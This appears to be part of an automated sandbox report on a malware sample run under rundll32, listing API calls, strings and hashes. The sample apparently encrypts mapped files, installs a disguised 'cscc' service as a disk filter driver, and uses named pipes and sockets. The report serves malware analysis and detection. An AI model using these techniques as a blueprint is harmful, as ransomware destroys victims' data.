                                              • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 04BF709F
                                              • Sleep.KERNELBASE(000003E8), ref: 04BF70B3
                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04BF70C4
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF70C7
                                              • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 04BF70E2
                                              • StrChrW.SHLWAPI(00000000,0000003A), ref: 04BF70F7
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04BF7114
                                              • HeapFree.KERNEL32(00000000), ref: 04BF7117
                                              • FlushFileBuffers.KERNEL32(?), ref: 04BF7120
                                              • DisconnectNamedPipe.KERNEL32(?), ref: 04BF7129
                                              • CloseHandle.KERNEL32(?), ref: 04BF7132
                                              Similarity
                                              • API ID: Heap$NamedPipe$Process$AllocDescriptorFileSecurity$BuffersCloseConnectCreateDaclDisconnectFlushFreeHandleInitializePeekReadSleep
                                              • String ID:
                                              • API String ID: 1225799970-0
                                              • Opcode ID: edf9b6147e9a5a546f1b3f62dc43a756ef05bc7ea69f4ad4868f5d2736cfda03
                                              • Instruction ID: 4d58856dca1bf1c6818c2adbadd93f1e73df0343896832a503e9fbf51b4d8430
                                              • Opcode Fuzzy Hash: edf9b6147e9a5a546f1b3f62dc43a756ef05bc7ea69f4ad4868f5d2736cfda03
                                              • Instruction Fuzzy Hash: 09415E31A00218BBEB215BB5DC49EAFBF3DEF45750F000495FA0AE6090CB749A58DAB0

                                              Control-flow Graph

                                              APIs
                                              • GetSystemInfo.KERNELBASE(?,00000000,?,00000000,?,?,?,?,?,?,?,?,04BF5E4C,?,?,00000000), ref: 04BF5BE3
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04BF5C14
                                              • MapViewOfFile.KERNELBASE(00000000,00000006,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04BF5C39
                                              • CryptDuplicateHash.ADVAPI32(FF0975E4,00000000,00000000,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04BF5C5D
                                              • CryptHashData.ADVAPI32(00000000,00000000,00000004,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04BF5C75
                                              • LocalAlloc.KERNEL32(00000040,15FF4877,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04BF5C8B
                                              • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04BF5CA4
                                              • memcpy.MSVCRT ref: 04BF5CB8
                                              • FlushViewOfFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,04BF5E4C,?,?), ref: 04BF5CDC
                                              • LocalFree.KERNEL32(?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04BF5CE8
                                              • CryptDestroyHash.ADVAPI32(00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04BF5CF1
                                              • UnmapViewOfFile.KERNEL32(?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04BF5CFA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: CryptHash$FileView$Local$AllocDataDestroyDuplicateFlushFreeInfoParamSystemUnmapUnothrow_t@std@@@__ehfuncinfo$??2@memcpy
                                              • String ID: encrypted
                                              • API String ID: 3326259677-1467498611
                                              • Opcode ID: 9ead68c9b719d52c198051fd53aa1610727ac1b85e9a240cd1e5abebb4ebae9e
                                              • Instruction ID: 4b076f6ee3994404a7dddd4ba5622b229d945c4e4486035509798a33592ef22f
                                              • Opcode Fuzzy Hash: 9ead68c9b719d52c198051fd53aa1610727ac1b85e9a240cd1e5abebb4ebae9e
                                              • Instruction Fuzzy Hash: 3141F8B1A00109BFDB10DF64DD48EAE7BB9FB44344F058165FA0AE7250EB75AE148BA0

                                              Control-flow Graph

                                              control_flow_graph 507 4bf1eb9-4bf1ee2 GetProcessHeap HeapAlloc 508 4bf204b-4bf2051 507->508 509 4bf1ee8-4bf1eeb 507->509 510 4bf1eee-4bf1ef3 509->510 510->510 511 4bf1ef5-4bf1efd 510->511 512 4bf1f00-4bf1f05 511->512 512->512 513 4bf1f07-4bf1f28 GetProcessHeap HeapAlloc 512->513 514 4bf1f2e-4bf1f77 htons 513->514 515 4bf2038-4bf204a GetProcessHeap HeapFree 513->515 516 4bf1f79-4bf1f81 514->516 515->508 516->516 517 4bf1f83-4bf1f85 516->517 518 4bf1f88-4bf1f8d 517->518 518->518 519 4bf1f8f-4bf1f9b 518->519 520 4bf1f9e-4bf1fa3 519->520 520->520 521 4bf1fa5-4bf1fae 520->521 522 4bf1fb0-4bf1fb8 521->522 522->522 523 4bf1fba-4bf1fbc 522->523 524 4bf1fbf-4bf1fc4 523->524 524->524 525 4bf1fc6-4bf1fcd 524->525 526 4bf1fd0-4bf1fd5 525->526 526->526 527 4bf1fd7-4bf1ff9 send 526->527 528 4bf1ffb-4bf2010 recv 527->528 529 4bf2028-4bf2032 GetProcessHeap HeapFree 527->529 528->529 530 4bf2012-4bf2015 528->530 529->515 530->529 531 4bf2017-4bf2024 530->531 531->529
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,00000000,00000000,00000000,?,0BADF00D,?,?,?,?,04BF943A), ref: 04BF1ED2
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,04BF943A), ref: 04BF1EDB
                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,04BF943A), ref: 04BF1F1F
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,04BF943A), ref: 04BF1F22
                                              • htons.WS2_32(?), ref: 04BF1F41
                                              • send.WS2_32(?,00000000,?,00000000), ref: 04BF1FF1
                                              • recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 04BF2008
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,04BF943A), ref: 04BF202B
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,04BF943A), ref: 04BF2032
                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,04BF943A), ref: 04BF203D
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,04BF943A), ref: 04BF2044
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocFree$htonsrecvsend
                                              • String ID: ?????
                                              • API String ID: 1780562090-2358547729
                                              • Opcode ID: 19d36b6ac6ed299f839e9919c1744ef9266a86c0d379c06ae2badec2d5041b5c
                                              • Instruction ID: 0f62a0cc0a153410939f3bb8d707d14afdd284c2c2ab3497d572b7ccb7ed384c
                                              • Opcode Fuzzy Hash: 19d36b6ac6ed299f839e9919c1744ef9266a86c0d379c06ae2badec2d5041b5c
                                              • Instruction Fuzzy Hash: 3D5104369002469FDB118F7CDC58AAA7BF9EF49300B0585D5ED89DB251DB35E809C7A0
                                              APIs
                                              • CryptDuplicateKey.ADVAPI32(?,00000000,00000000,?,00000000,?,00000000), ref: 04BF5D2A
                                              • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 04BF5D46
                                              • GetFileSizeEx.KERNEL32(00000000,?), ref: 04BF5D60
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04BF5D8D
                                              • CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,?,00000000), ref: 04BF5DBC
                                              • MapViewOfFile.KERNELBASE(?,00000006,00000000,00000000,?,00000000,?,?,?,00000010,?), ref: 04BF5DFD
                                              • CryptEncrypt.ADVAPI32(?,00000000,?,00000000,00000000,?,?), ref: 04BF5E1A
                                              • FlushViewOfFile.KERNEL32(?,?), ref: 04BF5E2C
                                              • UnmapViewOfFile.KERNEL32(?), ref: 04BF5E35
                                              • FindCloseChangeNotification.KERNELBASE(?,00000000,?,?,?,00000010,?), ref: 04BF5E54
                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 04BF5E71
                                              • CryptDestroyKey.ADVAPI32(?), ref: 04BF5E7F
                                              • SetEvent.KERNEL32(?), ref: 04BF5E92
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: File$CryptView$ChangeCloseCreateFindNotification$DestroyDuplicateEncryptEventFlushMappingSizeUnmapUnothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID:
                                              • API String ID: 2349520537-0
                                              • Opcode ID: 74c2c06a89cfcec7e20e8925efe263b8073345b60e896a44e5b23ee87c3eb5ba
                                              • Instruction ID: c462f80c7bc839785c5ebb9e1e152b35737ce4c5ec73bf1240ac36e84d17445a
                                              • Opcode Fuzzy Hash: 74c2c06a89cfcec7e20e8925efe263b8073345b60e896a44e5b23ee87c3eb5ba
                                              • Instruction Fuzzy Hash: DE517A72900219BBEF219FA1DC48EEFBF79FF08750F004066FA09A2151D775AA54DBA0
                                              APIs
                                              • FindResourceW.KERNEL32(?,00000006,00000000,?), ref: 04BF832A
                                              • LoadResource.KERNEL32(00000000), ref: 04BF8341
                                              • LockResource.KERNEL32(00000000), ref: 04BF8350
                                              • SizeofResource.KERNEL32(00000000), ref: 04BF8368
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 04BF8384
                                              • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 04BF838D
                                              • memcpy.MSVCRT ref: 04BF839C
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000002), ref: 04BF83B9
                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,00000002), ref: 04BF83BC
                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000004,?,?,?,?,00000002), ref: 04BF83FE
                                              • HeapFree.KERNEL32(00000000,?,?,?,00000002), ref: 04BF8401
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000002), ref: 04BF840A
                                              • RtlFreeHeap.NTDLL(00000000,?,?,?,00000002), ref: 04BF840D
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$ProcessResource$AllocateFree$FindLoadLockSizeofmemcpy
                                              • String ID:
                                              • API String ID: 3010137425-0
                                              • Opcode ID: 748466963b3b31000b9ff2b4271a28e3e301d5c288f92675681a0fb3c179bee7
                                              • Instruction ID: 92951815a5656c0378e9315e98369c6c53b401516cb7de227c26d2f8019b4efc
                                              • Opcode Fuzzy Hash: 748466963b3b31000b9ff2b4271a28e3e301d5c288f92675681a0fb3c179bee7
                                              • Instruction Fuzzy Hash: D8315075900205ABDB16AFA9DC48FAA7FA8EF49350F004055FA19D7290DB34EA14DB60
                                              APIs
                                              • GetSystemInfo.KERNELBASE(?,00000000,?,?,?,?,?,?,04BF5DE8,00000000,?,?,?,00000010,?), ref: 04BF5A92
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04BF5AC3
                                              • MapViewOfFile.KERNELBASE(00000010,00000004,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04BF5AEA
                                              • CryptDuplicateHash.ADVAPI32(?,00000000,00000000,00000010,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04BF5B32
                                              • CryptHashData.ADVAPI32(00000010,00000010,00000004,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04BF5B49
                                              • LocalAlloc.KERNEL32(00000040,?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04BF5B5F
                                              • CryptGetHashParam.ADVAPI32(00000010,00000002,00000000,?,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04BF5B77
                                              • LocalFree.KERNEL32(00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04BF5B99
                                              • CryptDestroyHash.ADVAPI32(00000010,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04BF5BA2
                                              • UnmapViewOfFile.KERNEL32(00000010,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04BF5BB4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: CryptHash$FileLocalView$AllocDataDestroyDuplicateFreeInfoParamSystemUnmapUnothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: encrypted
                                              • API String ID: 569730286-1467498611
                                              • Opcode ID: 6ddf1a9a1b3cba6932323e484d58140f363c8550522019c141fc29095c100542
                                              • Instruction ID: f5d1665934d40f776b1368868c0654bd536ccdc4a7d16af43eaa01e8c02eae5d
                                              • Opcode Fuzzy Hash: 6ddf1a9a1b3cba6932323e484d58140f363c8550522019c141fc29095c100542
                                              • Instruction Fuzzy Hash: 7E416DB2610209BFEB148F74DD44AAA7BA9EB44354F058069FE09E7241DB71EE15CBA0
                                              APIs
                                              • OpenSCManagerW.SECHOST(00000000,00000000,000F003F,00000000,?,cscc,?,04BF154F,00000000,04BF11D0,?,?,?), ref: 04BF1377
                                              • GetLastError.KERNEL32(?,04BF154F,00000000,04BF11D0,?,?,?), ref: 04BF1383
                                              • CreateServiceW.ADVAPI32(00000000,cscc,Windows Client Side Caching DDriver,000F01FF,00000001,00000000,00000003,cscc.dat,Filter,00000000,FltMgr,00000000,00000000,?,?,04BF154F), ref: 04BF13B6
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,04BF154F,00000000,04BF11D0,?,?,?), ref: 04BF13DB
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,04BF154F,00000000,04BF11D0,?,?,?), ref: 04BF13DE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Service$CloseHandle$CreateErrorLastManagerOpen
                                              • String ID: Filter$FltMgr$Windows Client Side Caching DDriver$cscc$cscc.dat
                                              • API String ID: 2226085316-2908389127
                                              • Opcode ID: fc572001eb8b7714751d978a7c6cad4c92f2359e9dd6ddb8c059940e621c9f8b
                                              • Instruction ID: 896b8edbc47f9cfd594e3e84ce1fc3af9d1275e56bfa9917b2a4bacee942f591
                                              • Opcode Fuzzy Hash: fc572001eb8b7714751d978a7c6cad4c92f2359e9dd6ddb8c059940e621c9f8b
                                              • Instruction Fuzzy Hash: 4C016235782324FBC7215BBAAC4DD9FBE6DDB05BA1B014862F60EA3540D9F46D01DAB0
                                              APIs
                                              • GetVersion.KERNEL32(SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318},UpperFilters,SYSTEM\CurrentControlSet\Control\Class\{71A27CDD-812A-11D0-BEC7-08002BE2092F},LowerFilters,00000000,04BF11D0,?,?,?), ref: 04BF1588
                                              Strings
                                              • cscc, xrefs: 04BF153A
                                              • SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318}, xrefs: 04BF1578
                                              • DumpFilters, xrefs: 04BF1592
                                              • LowerFilters, xrefs: 04BF155E
                                              • SYSTEM\CurrentControlSet\Control\CrashControl, xrefs: 04BF1597
                                              • UpperFilters, xrefs: 04BF1573
                                              • cscc, xrefs: 04BF1533
                                              • SYSTEM\CurrentControlSet\Control\Class\{71A27CDD-812A-11D0-BEC7-08002BE2092F}, xrefs: 04BF1563
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Version
                                              • String ID: DumpFilters$LowerFilters$SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318}$SYSTEM\CurrentControlSet\Control\Class\{71A27CDD-812A-11D0-BEC7-08002BE2092F}$SYSTEM\CurrentControlSet\Control\CrashControl$UpperFilters$cscc$cscc
                                              • API String ID: 1889659487-625840244
                                              • Opcode ID: 4d54b2fabcdc67bb19ab594764d4fd358e7b633e05b430f7596a24528c425ec0
                                              • Instruction ID: f36f534c25c8a09212f30bfd296b39c42ac9a7e46e19dc2333d0b71f2fb3fad2
                                              • Opcode Fuzzy Hash: 4d54b2fabcdc67bb19ab594764d4fd358e7b633e05b430f7596a24528c425ec0
                                              • Instruction Fuzzy Hash: F8F05421E82722A71BA576EDBC0171940929E0095830749E1EE4AA7141EA50FF08C7A1
                                              APIs
                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 04BF62A5
                                              • LocalFree.KERNEL32(?), ref: 04BF635D
                                                • Part of subcall function 04BF5507: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,00000000,?,04BF62C3,?), ref: 04BF5520
                                                • Part of subcall function 04BF5507: GetLastError.KERNEL32(?,04BF62C3,?), ref: 04BF5528
                                                • Part of subcall function 04BF5507: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008,?,04BF62C3,?), ref: 04BF553E
                                              • CloseHandle.KERNEL32(?,?), ref: 04BF6348
                                                • Part of subcall function 04BF5613: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 04BF5636
                                                • Part of subcall function 04BF5613: LocalAlloc.KERNEL32(00000040,?,00000000), ref: 04BF564C
                                                • Part of subcall function 04BF5613: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 04BF5662
                                                • Part of subcall function 04BF5613: CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 04BF5682
                                                • Part of subcall function 04BF5613: LocalAlloc.KERNEL32(00000040,?), ref: 04BF568D
                                                • Part of subcall function 04BF5613: CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 04BF56A6
                                                • Part of subcall function 04BF5613: CryptImportPublicKeyInfo.CRYPT32(?,00000001,00000000,?), ref: 04BF56B5
                                                • Part of subcall function 04BF5613: LocalFree.KERNEL32(00000000), ref: 04BF56BF
                                                • Part of subcall function 04BF5613: LocalFree.KERNEL32(?), ref: 04BF56C8
                                              • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?), ref: 04BF633F
                                                • Part of subcall function 04BF6085: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,?,00000000,?,?,?,04BF62E0,?,?,?,?), ref: 04BF60A6
                                                • Part of subcall function 04BF6085: CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,?,04BF62E0,?,?,?,?), ref: 04BF60BA
                                                • Part of subcall function 04BF6085: CryptDeriveKey.ADVAPI32(?,0000660E,?,00000001,?,?,?,?,04BF62E0,?,?,?,?), ref: 04BF60D3
                                                • Part of subcall function 04BF6085: CryptDestroyHash.ADVAPI32(?,?,?,?,04BF62E0,?,?,?,?), ref: 04BF60DF
                                              • CryptDestroyKey.ADVAPI32(?,?,?,?,?), ref: 04BF6336
                                                • Part of subcall function 04BF6246: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,00000000,?,?,04BF62E9,?,?,?,?), ref: 04BF6260
                                                • Part of subcall function 04BF6246: CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,04BF62E9,?,?,?,?), ref: 04BF6273
                                                • Part of subcall function 04BF6246: CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,04BF62E9,?,?,?,?), ref: 04BF6289
                                              • CreateThread.KERNELBASE(00000000,00000000,Function_000060F9,?,00000000,00000000), ref: 04BF62F7
                                                • Part of subcall function 04BF5E9F: PathCombineW.SHLWAPI(?,?,04C01554,?,?), ref: 04BF5EC8
                                                • Part of subcall function 04BF5E9F: FindFirstFileW.KERNELBASE(?,?), ref: 04BF5EE3
                                                • Part of subcall function 04BF5E9F: WaitForMultipleObjects.KERNEL32(00000001,?,00000000,00000000), ref: 04BF5F09
                                                • Part of subcall function 04BF5E9F: PathCombineW.SHLWAPI(?,?,?), ref: 04BF5FB1
                                                • Part of subcall function 04BF5E9F: StrStrIW.SHLWAPI(?,04C03014), ref: 04BF5FE9
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000011,?), ref: 04BF6312
                                              • CloseHandle.KERNEL32(00000000), ref: 04BF6319
                                              • CryptDestroyHash.ADVAPI32(?,?,00000011,?), ref: 04BF6322
                                              • CryptDestroyKey.ADVAPI32(?,?,?,?,?), ref: 04BF632D
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Crypt$Hash$Local$CreateDestroy$ContextFreeObject$AcquireAllocBinaryCloseCombineDataDecodeHandlePathStringWait$DeriveErrorEventFileFindFirstImportInfoLastMultipleObjectsParamPublicReleaseSingleThread
                                              • String ID:
                                              • API String ID: 2692407486-0
                                              • Opcode ID: 141c0ed1b8b70e9b2ea3482d08ca88f381fe1d656ce116f56b2ec4360dec1385
                                              • Instruction ID: 7b0266595542a044e2dc7e8406185763716829d7f4359136c5d8dbaf9aa8c6aa
                                              • Opcode Fuzzy Hash: 141c0ed1b8b70e9b2ea3482d08ca88f381fe1d656ce116f56b2ec4360dec1385
                                              • Instruction Fuzzy Hash: 31212F71100605BFFB216BB4ED88DAB7BADEF08355B04046AFF4B82461DB65FC568A70
                                              APIs
                                              • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 04BF5636
                                              • LocalAlloc.KERNEL32(00000040,?,00000000), ref: 04BF564C
                                              • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 04BF5662
                                              • CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 04BF5682
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 04BF568D
                                              • CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 04BF56A6
                                              • CryptImportPublicKeyInfo.CRYPT32(?,00000001,00000000,?), ref: 04BF56B5
                                              • LocalFree.KERNEL32(00000000), ref: 04BF56BF
                                              • LocalFree.KERNEL32(?), ref: 04BF56C8
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Crypt$Local$AllocBinaryDecodeFreeObjectString$ImportInfoPublic
                                              • String ID:
                                              • API String ID: 3940947887-0
                                              • Opcode ID: 807b9890a25485de0c0eca33aaf76bf1b71dbd0b131e2aa3d882748538901b77
                                              • Instruction ID: b7115582fcc96dab1a498d40f3c317ece085cb71d22b82219348d8e8d6d19063
                                              • Opcode Fuzzy Hash: 807b9890a25485de0c0eca33aaf76bf1b71dbd0b131e2aa3d882748538901b77
                                              • Instruction Fuzzy Hash: 5F215C72501218BADF219FA29C48EDFBF7DEF097A0F008051FA1DA6090D6719A14DBB0
                                              APIs
                                              • PathCombineW.SHLWAPI(?,?,04C01554,?,?), ref: 04BF5EC8
                                              • FindFirstFileW.KERNELBASE(?,?), ref: 04BF5EE3
                                              • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,00000000), ref: 04BF5F09
                                              • PathCombineW.SHLWAPI(?,?,?), ref: 04BF5FB1
                                              • StrStrIW.SHLWAPI(?,04C03014), ref: 04BF5FE9
                                              • PathFindExtensionW.SHLWAPI(?), ref: 04BF601B
                                              • FindNextFileW.KERNELBASE(?,?), ref: 04BF6065
                                              • FindClose.KERNELBASE(?), ref: 04BF6077
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Find$Path$CombineFile$CloseExtensionFirstMultipleNextObjectsWait
                                              • String ID:
                                              • API String ID: 1251538951-0
